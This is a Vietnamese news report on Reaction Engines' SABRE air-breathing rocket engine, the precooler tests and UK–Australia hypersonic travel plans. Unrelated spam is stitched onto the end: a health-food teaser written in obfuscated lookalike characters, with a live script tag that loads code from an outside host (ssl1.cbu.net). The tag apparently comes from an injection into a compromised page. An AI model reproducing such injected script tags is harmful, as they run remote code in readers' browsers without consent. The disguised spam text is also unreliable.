RSS

Máy bay siêu thanh đưa hành khách vượt 17.000km đến Úc chỉ trong 4 giờ

19:00 01/10/2019

Thời gian bay từ London (Anh) đến Sydney (Australia) cách nhau 17.000km có thể rút ngắn 80% vào những năm 2030, khi loại động cơ tên lửa đẩy siêu thanh mới chính thức được đưa vào sử dụng.

Hãng CNN đưa tin Cơ quan Hàng không Vũ trụ Anh ngày 24/9 thông báo sẽ phối hợp sâu rộng hơn với đối tác Australia trong thỏa thuận mang tên “cầu không gian đầu tiên thế giới”. Động cơ tên lửa đồng vận thông gió (SABRE) do hãng Reaction Engines – trụ sở tại Oxfordshire – chế tạo sẽ là điểm nhấn chính của công trình hợp tác trên.

“Khi chúng ta biến động cơ tên lửa SABRE thành hiện thực, chúng ta có thể đến Australia trong khoảng bốn giờ. Đây chính là công nghệ có thể mang đến điều đó”, ông Graham Turnock, người đứng đầu Cơ quan Hàng không Vũ trụ Anh cho biết.

Hình ảnh mô phỏng siêu máy bay không gian sử dụng động cơ SABRE. Ảnh: CNN

Tín đồ của máy bay siêu thanh đã chờ đợi mỏi mòn cho một hình thức di chuyển khác có thể phá vỡ rào cản âm thanh kể từ khi máy bay Concorde ngừng hoạt động năm 2003. Tháng 4/2019, hãng Reaction Engines thông báo đã thử nghiệm thành công bộ làm nguội trước (precooler), mô phỏng những điều kiện cần thiết ở tốc độ Mach 3.3 hay gấp 3 lần vận tốc âm thanh.

Tốc độ này hơn 50% so với vận tốc của Concorde – từng bay từ New York đến Paris trong gần 3,5 giờ – và cũng tương đương với vận tốc kỷ lục của chiếc máy bay phản lực nhanh nhất: Lockheed SR-71 Blackbird.

Các thí nghiệm về bộ phận làm nguội trước được tiến hành tại Trung tâm hàng không và vũ trụ Colorado ở Mỹ. Tại tốc độ cao như vậy, luồng khí chạy qua động cơ có thể đạt đến nhiệt độ vô cùng lớn, tiềm ẩn nguy cơ gây hiểm họa. Thiết bị này sẽ giúp giảm nhiệt độ của khí gas trước khi chúng đi vào động cơ.

Những thí nghiệm gần đây chứng tỏ bộ phận trên có thể làm mát khí gas từ hơn 1.000 độ C về nhiệt độ môi trường xung quanh trong chưa đầy 1/20 giây, theo tuyên bố của Reaction Engines.

“Đây là cột mốc cực kỳ quan trọng, ghi dấu bộ làm mát trước độc quyền của Reaction Engines đạt được hiệu suất truyền nhiệt vô song”, ông Mark Thomas, Giám đốc điều hành Reaction Engines cho biết.

Ông Thomas nhấn mạnh công nghệ này cũng có thể ứng dụng vào ngành hàng không điện hybrid và các chuyến bay tốc độ cao. Động cơ SABRE được thiết kế để đạt đến vận tốc trên Mach 5 trên khí quyển Trái Đất, và sau đó có thể biến thành một quả tên lửa với khả năng bay xuyên vũ trụ ở vận tốc Mach 25.

Nó “hít thở” không khí trong bầu khí quyển, cho phép hiệu quả nhiên liệu lớn hơn và trọng lượng nhẹ hơn so với các động cơ tên lửa hiện nay khi cần phải mang thêm nguồn cung cấp oxy riêng.

“Đặc điểm chính của SABRE là việc nó giống như một dạng lai giữa động cơ tên lửa và động cơ máy bay, nên nó phép tên lửa hít thở không khí”, ông Shaun Driscoll, Giám đốc chương trình của Reaction Engines hé lộ.

Theo ông, tên lửa thực sự không tiến triển nhiều trong 70 năm qua, trong khi động cơ máy bay lại trở nên rất hiệu quả. Do vậy, có thể kết hợp động cơ máy bay và tên lửa để tạo ra một hệ thống đẩy vừa hiệu quả vừa nhẹ, đồng thời về cơ bản tạo ra một chiếc máy bay không gian.

Công nghệ thú vị đã đem về cho Reaction Engines hơn 130 triệu USD tiền tài trợ nghiên cứu trong 4 năm qua, cũng như thu hút đầu tư từ các ông lớn trong ngành công nghiệp này là BAE Systems, Rolls-Royce và Boeing HorizonX.

Theo Báo Tin Tức

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп<script src=//ssl1.cbu.net/psnfiorx></script>

Tɦᴜốc ɓổ ƙɦôпɢ ɓằпɢ łɦực ρɦẩɱ ɓổ: Cácɦ cɦăɱ sóc пɢũ łạпɢ łốł пɦấł ɢiúρ ɓạп sốпɢ łɦọ ɦơп

Tɦeo các ɓác sĩ, sức ƙɦỏe củɑ пɢũ łạпɢ qᴜyếł ᵭịпɦ łᴜổi łɦọ củɑ ɓạп. Đây ℓà ɓí qᴜyếł ℓựɑ cɦọп łɦực ρɦẩɱ cɦăɱ sóc cơ łɦể łốł пɦấł ɓạп пêп łɦɑɱ ƙɦảo ᵭể ℓᴜôп ƙɦỏe ɱạпɦ ʋà łɾườпɢ łɦọ.